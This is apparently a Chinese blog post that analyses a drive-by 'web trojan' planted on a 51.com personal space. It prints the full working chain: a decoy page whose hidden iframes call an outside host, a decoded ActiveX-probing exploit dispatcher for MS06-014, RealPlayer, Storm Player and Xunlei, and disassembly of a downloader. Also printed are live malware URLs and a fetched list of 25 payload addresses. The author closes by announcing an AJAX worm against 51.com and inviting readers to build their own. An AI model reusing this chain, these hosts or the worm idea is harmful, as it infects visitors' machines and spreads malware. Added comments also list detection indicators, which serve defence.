无意发现51某个空间有木马,就分析了一下。
<!-- Landing page of the drive-by chain. Everything the visitor sees is a decoy:
     a "page does not exist" notice and a fake loading bar that keeps the
     browser on the page for roughly one second, while three hidden iframes
     appended after </html> (see the end of this file) fetch the next stage
     4.htm from 60.190.118.233. -->
<html>
<title></title>
<table border="0" cellspacing="0" cellpadding="0" align="center" height=160>
<tr><td >
<b>出错了 你访问的页面并不存在</b>
</td></tr>
</table>
<br><br><br>
<center>
<!-- The form exists only so the script below can address two text inputs
     (document.loading.chart / document.loading.percent) as a text-drawn
     progress bar. -->
<form name=loading>
<p><font color="7285CF">正在为你载入,请稍候.......</font></p>
<p>
<input type=text name=chart size=46 style="font-family:Arial; font-weight:bolder; color:7285CF; background-color:white; padding:0px; border-style:none;">
<br>
<input type=text name=percent size=46 style="font-family:Arial; color:FF0000; text-align:center; border-width:medium; border-style:none;">
<!-- Fake progress bar: bar counts 0 -> 100 in steps of 2 every 20 ms
     (about one second in total), then the top window is sent to 55py.com. -->
<script>var bar = 0
var line = "||"
var amount ="||"
count()
// Advances the fake progress bar by one step and reschedules itself until it
// reaches 100%; presumably the delay is there to give the hidden iframes below
// time to load before the visible redirect happens.
function count(){
bar= bar+2
amount =amount + line
document.loading.chart.value=amount
document.loading.percent.value=bar+"%"
if (bar<100)
{setTimeout("count()",20);}
else
// The redirect is the only outcome the victim ever sees.
{window.location = "http://www.55py.com/";}
}
</script>
</p>
</form>
</html>
<!-- Injection point: three zero-height, borderless iframes placed after
     </html> (browsers still parse and render them) load 4.htm from an external
     host. height=0 / frameborder=0 iframes pointing at a foreign host are a
     classic signature for detecting this kind of injected content. -->
<iframe src=http://60.190.118.233/4.htm width=97 height=0 frameborder=0></iframe>
<iframe src=http://60.190.118.233/4.htm width=100 height=0 frameborder=0></iframe>
<iframe src=http://60.190.118.233/4.htm width=100 height=0 frameborder=0></iframe>
接下来,看看4.htm的内容
<!-- Second stage (4.htm): one more hidden iframe chains to the actual exploit
     page /ai/index.htm, and two cnzz.com counter scripts give the operator
     visitor statistics for the kit. The doubled quotes ('') around the src
     values appear to be an artifact of how the post was saved, not part of the
     original file; the stray <HTML><BODY> after the scripts is quoted here in
     the order it appeared in the file. -->
<iframe src=http://60.190.118.233/ai/index.htm width=100 height=0></iframe>
<script src=''http://s35.cnzz.com/stat.php?id=876890&web_id=876890'' language=''JavaScript'' charset=''gb2312''></script>
<script src=''http://s141.cnzz.com/stat.php?id=854550&web_id=854550'' language=''JavaScript'' charset=''gb2312''></script>
<HTML><BODY>
两个站长统计(cnzz)脚本.继续看 /ai/index.htm 的内容
<script>window.onerror=function(){return true;}</script>
<Script Language="JScript.Encode">#@~^6goAAA==@#@&d-mD,mWK3,xPr/rVxOAsJi@#@&d@#@&d6;UmDkKx~/nO;WG3bn` lhnBP\Cs!+SPaak.#,@#@&i ,~P@#@&7dSkU[KhR9Gm!:+ O mKW0knPx~ lh+,QPr''E~3P+d^mwn`7C^En*P3P`v+X2kM+~''{PU;^V#,_PrJP=~cJpP62k.nk''EP3~+Xwr.RYG!tKjYMr oc*#*i@#@&d)@#@&@#@&70!x^ObWx,L+DZWKVr+v1m:n#~@#@&d`P,~@#@&d7-mDPdnmD^t,x,1Cs+,_Pr''rI@#@&d7k6PcAbxNKAR9Wm!hnxDR1WG3rncVnxTOt,@*~T*P@#@&7i ~@#@&7idG60k+Y,'',Ak NGhcNG^!:+ OR1WW0rnRbx9+arWck+CD14#p@#@&7idkW~vWW0knDPZ{P F#,@#@&7di ~@#@&d77iW06d+DP_{~d+mD1t VnUTY4i,~P,P~~@#@&d77,Pnx9~{PAbx9WhcNK^Es+UYcmGG0k+crx9+6}WcJpJBPG0WdYbP,~P,P~@#@&dd7~,kWPvn N~{'',OF*@#@&7diP~P,+U[,''PSrx9Whc[Gm!:xOR^GK3r+cs+ oO4p@#@&77iP~DO!DU,E +/1lan`SkUNKh [KmEsnxDRmKGVkRkE8/O.bxL`KW0k+OS,+x[b*i@#@&i7iPN@#@&idP)@#@&7P,DnY!DU~ EV^I@#@&d8@#@&@#@&i0!x^YrG P.+Tr/D+.c l:nb,@#@&dP@#@&d77lMPYKNmzP{PU+SP9CD+`*I@#@&dd7C.P6ak.+d~{PU+S~fmYnc*i@#@&7i+awb./ k+DKks+vOW9lzRT+OPb:+vbP3PFZTTe+!CvTe+**i@#@&i7/Y/GK3knc1WG3B~ lh~,+6akMn/*i@#@&i8@#@&@#@&d6;x1YkKU~Wa+ \`b~@#@&7 @#@&di\C.,mPx~T+OZKG0knvmKW3*i@#@&dikWPvm~Z{Px!sV*P@#@&77 @#@&iP~d.nDE.xp@#@&idN@#@&dd@#@&id.+TrkYnM`1WW0#p@#@&id@#@&idAr NWS N0l!sO?DlDEd''E完成Ep@#@&di7@#@&d7OMX ~-mD~+p@#@&d7i\mDPmNKx`9W^Es+UOcmDCY2VhnxD`rW8Ln^DJb#p@#@&id7C9WRdnDbOYMr(EO`rmVm/krNr~Em^/r[=AfOZl*v Xb2O8F9!R1R&)OZTZZco/y,2fr#I@#@&7id-mD,l/{l9GR1DnlD+G8N+mDcJzNW98 ?DDlhJSEr#N@#@&7d1lO^4`+b`)i@#@&i76kUmV^X @#@&i7db0c+e''E,K4L^Y,2DMG.Tr#P@#@&d77iNGm!h+ Y AMkYncr@!r0MCs+~Sk9Yt{*Z~tkLtD''T~kDm{qcctYs@*@!zb0Mlh+@*E*8@#@&i7dVdn@#@&d77Pd@#@&i7idOMXPP\mD,%i@#@&7did7-mDPMnl^FF{Unh,b1Yr\np}4%+1O`rq3]hJ_E/DV qrQr2]hZDVR8J*I8@#@&7did^CDmtv%#P8i@#@&7did6kUlssH r0v%"{J,G(L+^O,2.DK.YJbPk6`xh,)mDk-+or8%mYvEqAIn;OsR&2"n/Ys 8JbRhslH+.KMWwn.DXcJh]}fi;Kj2IUq}HJ*@!xJ+RT 8cRlX r#@#@&~~P,P,P~P~~,P~P,~P,P~~,PP~~,P~P,~,P~,P,P 9W1;:xORSDrO`B@!r0Ml:~Ak9Y4''q!~4kLtDx!,/.^{DV 4D:@*@!Jr6DCs+@*B#)@#@&~P,P~P,P~~,PP,~P,PP,~~P,PVd+@#@&,P~P,~P,P~~,PP~~,P~P,~,P~P@#@&ddidi[W1Eh+ Y AMkYcB@!k0MCh+,hbNOtxqZP4+bLtD''T~kDmxUh tDh@*@!&b0Ml:@*Eb8)8@#@&@#@&77idYMz 
,\lM~Li@#@&id7d7-mD~o^AWMV[x +h~)1Yr\p}4%mD`JVS&3fKhUR&29GSxR8E#p8@#@&77dimmY^tcL* Ni@#@&did7WbxlssH r0vLe''E]W(L+1Y,3DMW.Tr#`@#@&ddi7d9Wm!hnxDRSDrYncE@!r0MC:PdOHV+x[b/2Vmz=xG +,/D1''^"R4Yh@*@!zrWMl:@*B*88@#@&@#@&ididODz`,\CD,4i@#@&77idd-CMPdYK.s''Uh,bmDk7n(}4%+1YcEtn?cjYKD:hsCXDcFE#IN@#@&7di7mmY^4vt#`Np@#@&di7i0r l^VXPk6cte''E$K4%n1YPA.DKDTrb`@#@&did7d[G1Eh+ ORSDrO`B@!r6DC:~kYz^+{Nkkw^CX=xGxPd.1''46 tD:@*@!&r0Mls+@*BbN)@#@&@#@&7didO.H P-CMPWi@#@&id7id7lD,Y4;x9+.'' +A~zmYb-+or4Nn^YvJGn/Vrn Y .K[J*iN@#@&dd771lOm4c6#`)i@#@&didiWk lsVH ~r6`0exJ]W4Nn^Y,2MDGDDE* @#@&i7did[G1E:nUDRADbO`v@!k6Dls+,Ak9Y4''l!~4ko4O''ZP/M^x6^R4Yh@*@!&b0.lsn@*E#NN@#@&@#@&7id7k6c6''xr$K4LmD~2MDGDYJ~''LPo{xJ]W4Nn^Y,2MDGDDE,[''P4x''r$G8N+mO~AD.WMDrP''LPN''''r$K8LmOPAD.GMTJ*@#@&iddi`sW1lDkGx .wsl1n`rl8G!Y)8smxVJ*I)@#@&idi88@#@&iN@#@&@#@&Wa+U t`#p@#@&r+YCAA==^#~@</script>
</BODY></HTML>
看JS:<Script Language="JScript.Encode"> 用的是 JScript.Encode 编码(可逆的混淆,并非真正的加密),找个解码工具解开.
<script>window.onerror=function(){return true;}</script>
<Script Language="JScript">
// Name of the marker cookie that openWM() uses to run the probes only once per
// browser within 24 hours. "silentwm" is also a handy string to search for when
// hunting for this kit in page sources or proxy logs.
var cook = "silentwm";
// Writes the cookie `name`=`value` (value URL-escaped). `expire` is a Date or
// null; null omits the expires attribute, i.e. a session cookie.
function setCookie(name, value, expire)
{
window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));
}
// Returns the unescaped value of cookie `Name`, or null when document.cookie is
// empty or does not contain "Name=". Note that `offset` and `end` are assigned
// without `var`, so they leak as globals; kept exactly as in the sample.
function getCookie(Name)
{
var search = Name + "=";
if (window.document.cookie.length > 0)
{
offset = window.document.cookie.indexOf(search);
if (offset != -1)
{
offset += search.length;
// The value runs up to the next ';' or, for the last cookie, to the end.
end = window.document.cookie.indexOf(";", offset)
if (end == -1)
end = window.document.cookie.length;
return unescape(window.document.cookie.substring(offset, end));
}
}
return null;
}
// Sets the marker cookie `cook` to `name`, expiring 24 hours from now. The only
// caller passes the cookie name itself as the value, so name and value are
// both "silentwm".
function register(name)
{
var today = new Date();
var expires = new Date();
expires.setTime(today.getTime() + 1000*60*60*24);
setCookie(cook, name, expires);
}
// Exploit dispatcher. After a once-per-24h cookie gate it probes for ActiveX
// controls by instantiating them inside try/catch/finally and, for each control
// that instantiates, document.write()s a hidden iframe pointing at the matching
// exploit page on the same host (14.htm, rl.htm, new.htm, lz.htm, bf.htm, xl.htm).
// The probes rely on old JScript scoping: the catch parameter is visible in the
// finally block, so after a throw the variable stringifies to "[object Error]"
// and after a successful instantiation it is still undefined.
// The doubled quotes ('') in several document.write calls appear to be an
// artifact of how the post was saved (single quotes in the original).
// Detection hints: the CLSID and ProgIDs below, the "silentwm" cookie and the
// zero-height / display:none iframes are all usable as page-level indicators.
function openWM()
{
// Run at most once per browser per 24 hours (see register()); a revisit shows
// an empty, apparently harmless page.
var c = getCookie(cook);
if (c != null)
{
return;
}
register(cook);
window.defaultStatus="完成";
// Probe 1: create an <object> with the RDS.DataSpace CLSID and ask it for an
// ADODB.Stream instance, i.e. the MS06-014 primitive. If nothing is thrown the
// control is scriptable and 14.htm is loaded in a hidden iframe.
try{ var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
if(e!="[object Error]"){
document.write("<iframe width=50 height=0 src=14.htm></iframe>")}
else // labelled "MS06014 vulnerability" in the sample; the MS06-014 path is the branch above, everything below runs only when it is unavailable
{
// Probe 2: RealPlayer IERPCtl. The ProgID is split into string fragments,
// presumably to dodge simple signature matching. If PlayerProperty reports a
// version <= 6.0.14.552 (a string comparison, so lexicographic) rl.htm is
// loaded, otherwise new.htm.
try{ var j;
var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}
catch(j){};
finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")
{document.write(''<iframe width=10 height=0 src=rl.htm></iframe>'')}// RealPlayer vulnerability
else
{
document.write(''<iframe width=10 height=0 src=new.htm></iframe>'')}}}
// Probe 3: GLIEDown.IEDown.1 (the variable name suggests the GLWorld game
// client; not confirmed from the page). Success -> lz.htm.
try{ var g;
var glworld=new ActiveXObject("GLIEDown.IEDown.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write(''<iframe style=display:none src=lz.htm></iframe>'')}}
// Probe 4: Storm Player (暴风影音) MPS.StormPlayer.1. Success -> bf.htm.
try{ var h;
var storm=new ActiveXObject("MPS.StormPlayer.1");}
catch(h){};
finally{if(h!="[object Error]"){
document.write(''<iframe style=display:none src=bf.htm></iframe>'')}}
// Storm Player vulnerability
// Probe 5: Xunlei (Thunder) DPClient.Vod. Success -> xl.htm.
try{ var f;
var thunder=new ActiveXObject("DPClient.Vod");}
catch(f){};
finally{ if(f!="[object Error]"){
document.write(''<iframe width=50 height=0 src=xl.htm></iframe>'')}}
// Xunlei (Thunder) vulnerability
// No exploitable control found: blank the page so the victim sees nothing.
if(f=="[object Error]" && g=="[object Error]" && h=="[object Error]" && j=="[object Error]")
{location.replace("about:blank");}
}}
}
// Entry point: the probes run as soon as this script block is parsed.
openWM();
</script>
网马利用的漏洞:MS06-014、暴风影音、迅雷、RealPlayer
木马地址:
http://60.190.118.233/8/x.exe
UPX壳
// Original entry point of x.exe after the UPX layer is removed. The
// push 70 / push 00403118 / call ... prologue looks like the standard MSVC CRT
// startup stub, consistent with the "Microsoft Visual C++ 7.0" identification
// given below.
004022F2 6A 70 push 70 //OEP
004022F4 68 18314000 push 00403118
004022F9 E8 CA020000 call 004025C8
004022FE 33DB xor ebx, ebx
Microsoft Visual C++ 7.0 Method2
; Function resolution in the downloader. For each of three names the code
; pushes the name pointer and edi, calls the routine in esi (presumably
; GetProcAddress with edi = module handle; neither is visible in this excerpt)
; and caches the returned address:
;   httpaddurl -> [405500], inithttp -> [405504], readhttp -> [405508].
; These are not standard Win32 exports, so they presumably belong to a helper
; DLL shipped with the downloader. The cmp at 0040213E checks that the inithttp
; lookup succeeded before the cached pointers are used.
0040211C 68 F4404000 push 004040F4 ; httpaddurl
00402121 57 push edi
00402122 FFD6 call esi
00402124 68 E8404000 push 004040E8 ; inithttp
00402129 57 push edi
0040212A A3 00554000 mov dword ptr [405500], eax ; cache httpaddurl
0040212F FFD6 call esi
00402131 68 DC404000 push 004040DC ; readhttp
00402136 57 push edi
00402137 A3 04554000 mov dword ptr [405504], eax ; cache inithttp
0040213C FFD6 call esi
0040213E 833D 04554000 0>cmp dword ptr [405504], 0 ; inithttp resolved?
00402145 A3 08554000 mov dword ptr [405508], eax ; cache readhttp
0040214A 5E pop esi
这是一个下载者(downloader):它先访问 b.txt 文件,挖哈哈,里面有25个文件地址....
GET /8/b.txt HTTP/1.1
Host: 60.190.118.233
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; XP)
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 200 OK
Content-Length: 989
Content-Type: text/plain
Last-Modified: Mon, 12 May 2008 19:17:37 GMT
Accept-Ranges: bytes
ETag: "f24d28d764b4c81:743"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 13 May 2008 05:30:57 GMT
Connection: close
ver=1
Url1=http://dl.ssl790.cn/cao/aa1.exe
Url2=http://dl.ssl790.cn/cao/aa2.exe
Url3=http://dl.ssl790.cn/cao/aa3.exe
Url4=http://dl.ssl790.cn/cao/aa4.exe
Url5=http://dl.ssl790.cn/cao/aa5.exe
Url6=http://dl.ssl790.cn/cao/aa6.exe
Url7=http://dl.ssl790.cn/cao/aa7.exe
Url8=http://dl.ssl790.cn/cao/aa8.exe
Url9=http://cw.ssl790.cn/cao/aa9.exe
Url10=http://cw.ssl790.cn/cao/aa10.exe
Url11=http://cw.ssl790.cn/cao/aa11.exe
Url12=http://cw.ssl790.cn/cao/aa12.exe
Url13=http://cw.ssl790.cn/cao/aa13.exe
Url14=http://cw.ssl790.cn/cao/aa14.exe
Url15=http://cw.ssl790.cn/cao/aa15.exe
Url16=http://cw.ssl790.cn/cao/aa16.exe
Url17=http://ta.ssl790.cn/cao/aa17.exe
Url18=http://ta.ssl790.cn/cao/aa18.exe
Url19=http://ta.ssl790.cn/cao/aa19.exe
Url20=http://ta.ssl790.cn/cao/aa20.exe
Url21=http://ta.ssl790.cn/cao/aa21.exe
Url22=http://ta.ssl790.cn/cao/aa22.exe
Url23=http://ta.ssl790.cn/cao/aa23.exe
Url24=http://ta.ssl790.cn/cao/aa24.exe
Url25=http://ta.ssl790.cn/cao/aa25.exe
木马还免杀的...
接下来,搞51.com的AJAX蠕虫,它对flash文件没有任何过滤.现在还属于危险期间,就不公布病毒代码了,其他的就自己发挥了...
效果还比较猛...现在